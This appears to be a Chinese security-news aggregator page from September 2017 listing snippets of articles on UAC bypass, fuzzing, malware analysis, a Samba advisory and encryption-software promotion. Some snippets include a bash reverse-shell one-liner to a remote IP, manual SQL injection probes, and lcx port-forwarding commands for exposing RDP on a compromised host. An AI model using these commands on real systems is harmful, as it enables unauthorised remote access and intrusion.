Clik here to view.
【技术分享】利用感染的PPT文件绕过UAC策略
【技术分享】利用感染的PPT文件绕过UAC策略 2017-09-22 10:13:54 阅读:27次 点赞(0) 收藏 来源: hackersgrid.com 作者:an0nym0u5 译者:an0nym0u5 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 新式PPT攻击流程...
View ArticleClik here to view.
【技术分享】使用 WinAFL 对 MSXML6 库进行模糊测试
【技术分享】使用 WinAFL 对 MSXML6 库进行模糊测试 2017-09-22 11:28:23 阅读:239次 点赞(0) 收藏 来源: symeonp.github.io 作者:天鸽 译者:天鸽 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 MSXML库模糊测试 在这篇博客中,我将介绍怎样使用WinAFLfuzzer 来对 MSXML...
View ArticleClik here to view.
【知识】9月22日 - 每日安全知识热点
【知识】9月22日 - 每日安全知识热点 2017-09-22 10:54:16 阅读:149次 点赞(0) 收藏 来源: 安全客 作者:童话 热点概要:针对联网智能灯泡的安全性分析、维基解密公布新文档 揭露俄罗斯实施的大规模监控活动、[Project Zero]模糊测试5个最常用的浏览器DOM引擎 、蓝牙安全向导、针对CVE-2016-10190的详细分析、浅析python对象注入...
View ArticleClik here to view.
【技术分享】对CCleaner的C2服务器的技术分析
【技术分享】对CCleaner的C2服务器的技术分析 2017-09-22 14:33:12 阅读:1次 点赞(0) 收藏 来源: talosintelligence.com 作者:blueSky 译者:blueSky 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 简介...
View ArticleClik here to view.
【技术分享】看我如何进行Python对象注入利用
【技术分享】看我如何进行python对象注入利用 2017-09-22 13:59:21 阅读:13次 点赞(0) 收藏 来源: defencely.com 作者:天鸽 译者:天鸽 预估稿费:130RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 简介 在今天的 Defencely Lab 中,我们将详细介绍和演示 Python 对象注入攻击(Python Object...
View ArticleLinux 下多种编程语言的反弹 shell 方法
bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1perl版本:perl -e 'use...
View Articlesql手工注入语句&SQL手工注入大全
看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access4.注入参数是字符'and [查询条件] and...
View ArticleClik here to view.
【技术分享】如何枚举Windows中的进程、线程以及映像加载通知回调例程
【技术分享】如何枚举windows中的进程、线程以及映像加载通知回调例程 2017-09-22 16:41:07 阅读:48次 点赞(0) 收藏 来源: triplefault.io 作者:興趣使然的小胃 译者:興趣使然的小胃 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 一、前言...
View ArticleClik here to view.
【漏洞预警】SambaBleed:Samba信息泄露漏洞(CVE–2017–12163)预警
【漏洞预警】SambaBleed:Samba信息泄露漏洞(CVE–2017–12163)预警 2017-09-22 19:56:23 阅读:30次 点赞(0) 收藏 来源: 安全客 作者:360CERT 0x00 事件描述 Samba作为linux和UNIX系统上实现SMB协议的一个免费软件,在*nix领域有很广泛的应用场景。 日前,360 Gear...
View ArticleClik here to view.
lcx端口转发详细介绍及使用方法(lcx内网转发姿势)
这里小编要讲解到另外一款比较强大的LCX端口转发的工具.下面就先详细讲解下LXC转发工具与使用方法:lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.用法:如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave本机ip 51 肉鸡ip 3389...
View ArticleClik here to view.
网络安全基础问答25例,白帽黑客和安全研究员必备!
1)什么是白帽黑客?白帽黑客是指当某个人被允许在企业产品所有者允许的情况下攻击系统,以便在系统中发现弱点,然后修复bug。2)IP地址和Mac地址有什么区别?IP地址:分配每个设备的IP地址,使设备位于网络上。MAC(机器访问控制)地址:MAC地址是分配给每个设备上每个网络接口的唯一序列号。3)列出白帽黑客经常使用的一些工具?KaliMeta SploitWire SharkNMAPJohn The...
View ArticleClik here to view.
lcx用法之心得总结(piracy)
1. 首先我们要知道为什么有lcx这个工具?存在即合理,它的出现肯定是为了达到什么目的,达到什么目的呢?看看下图,上面明确说明了使用方法:第一条指令:lcx.exe –listen本机连接端口转发到端口;第二条很少用,理解不深刻,请大牛指教;第三条指令:lcx.exe –slave转发到的ip 端口 服务器ip端口; 总而言之:它的出现主要是为了完成端口的转发。1....
View ArticleClik here to view.
企业间管理资源共享、电脑设置共享权限访问、本地策略共享设置权限的方法
现在很多企业局域网都有文件服务器,并且经常把单位一些重要文件放到文件服务器上共享给局域网用户访问使用,这虽然实现了资源共享,便于大家协同工作。但也使得单位共享文件存在随意访问、越权访问的风险,容易导致服务器共享文件泄露。因此,我们必须采取有效的举措,保护服务器共享文件的安全。通常情况下,网管员都是通过操作系统的文件共享权限来限制用户访问共享文件的行为,比如只读、禁止删除等。虽然可以起到一定的安全防护...
View ArticleClik here to view.
大势至防止文件被复制软件、公司防泄密软件、电脑文件防止泄露软件网络版V11.3使用说
大势至公司防泄密软件网络版(下载地址:http://www.grabsun.com/monitorusb.html),基于C/S架构,在局域网一台电脑安装管理端,局域网其他电脑安装客户端,就可以远程设置局域网电脑的USB存储设备使用情况,可以有效禁止U盘使用、禁止网盘上传文件、禁止微信发送文件、禁止邮件附件上传、禁止FTP文件上传、禁止QQ发送文件等,防止通过网络途径泄密的行为。网络版包含管理端和客...
View ArticleClik here to view.
U盘加密软件有哪些、优盘加密软件哪个好、U盘文件加密工具的选择
现在U盘的存储空间越来越大,读写速度越来越快,可以轻松存储大量的文件到U盘里面;同时,优盘具有便携性等特点,使得U盘的使用极为普遍。但是,优盘在方便了工作生活的同时,也面临着一些风险。尤其是当U盘文件比较重要,而丢失U盘的情况,则会引发各种信息泄密的风险,网络上各种“门”就是前车之鉴。同时,如果丢失的U盘存储了单位的商业机密信息,还会对企业的经营安全带来风险。因此,我们需要保护U盘文件安全,防止U盘...
View ArticleClik here to view.
如何给电脑文档加密、计算机文件夹加密软件和计算机硬盘加密技术的选择
现在,在公司上班族中,由于每天都会形成很多工作文件,一些文件还涉及到单位的无形资产和商业机密,如何保护这些文件的安全就成为当前企业网络管理的重要方面。而对于电脑文件加密,则通常有两种方法:软件加密和硬件加密。那么,如何选择合适的电脑文件加密系统呢?下面我们可以比较选择一下:硬件加密技术与软件加密技术谁更好:那么在谈论加密技术的时候,究竟硬件加密技术好还是软件加密技术更优秀?往往我们也对这两种主流的方...
View ArticleClik here to view.
Windows文件夹加密软件、计算机文件夹加密软件、企业加密软件那个好
无论是工作还是生活,电脑已经成为我们每天不可缺少的工具之一。我们也经常会在电脑存储一些重要的私人文件或者是公司的机密文件,这些文件的安全管理就显得十分重要。通过使用一些电脑文件加密软件对电脑文件进行加密,不失为一种有效的防止电脑文件泄密的方法。对于用户来说,如何选择合适的电脑文件加密软件呢?笔者以为,可以通过以下几个方面进行考量:首先,要考虑到加密软件的人性化、易用性,具有良好的用户体验。毕竟我们每...
View ArticleClik here to view.
【知识】9月23日 - 每日安全知识热点
【知识】9月23日 - 每日安全知识热点 2017-09-23 11:11:11 阅读:287次 点赞(0) 收藏 来源: 安全客 作者:77caikiki 热点概要:Adobe Security Incident Response泄露private key、Google使用fuzzer Domato测试了浏览器Top 5,发现Safari充斥着安全漏洞、Hack the Hacker -...
View ArticleClik here to view.
【知识】9月24日 - 每日安全知识热点
【知识】9月24日 - 每日安全知识热点 2017-09-24 10:19:33 阅读:1次 点赞(0) 收藏 来源: 安全客 作者:trip1e_chee5e 热点概要:54万辆汽车密码泄露、Coinhive已成为当前最火恶意程序、Retefe——通过永恒之蓝传播的银行木马、linux木马利用IOT设备发送垃圾邮件、DenyAll WAF...
View ArticleClik here to view.
【技术分享】TrickBot银行木马Web Injects分析
【技术分享】TrickBot银行木马Web Injects分析 2017-09-25 10:21:27 阅读:527次 点赞(0) 收藏 来源: uperesia.com 作者:blueSky 译者:blueSky 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 前言...
View Article
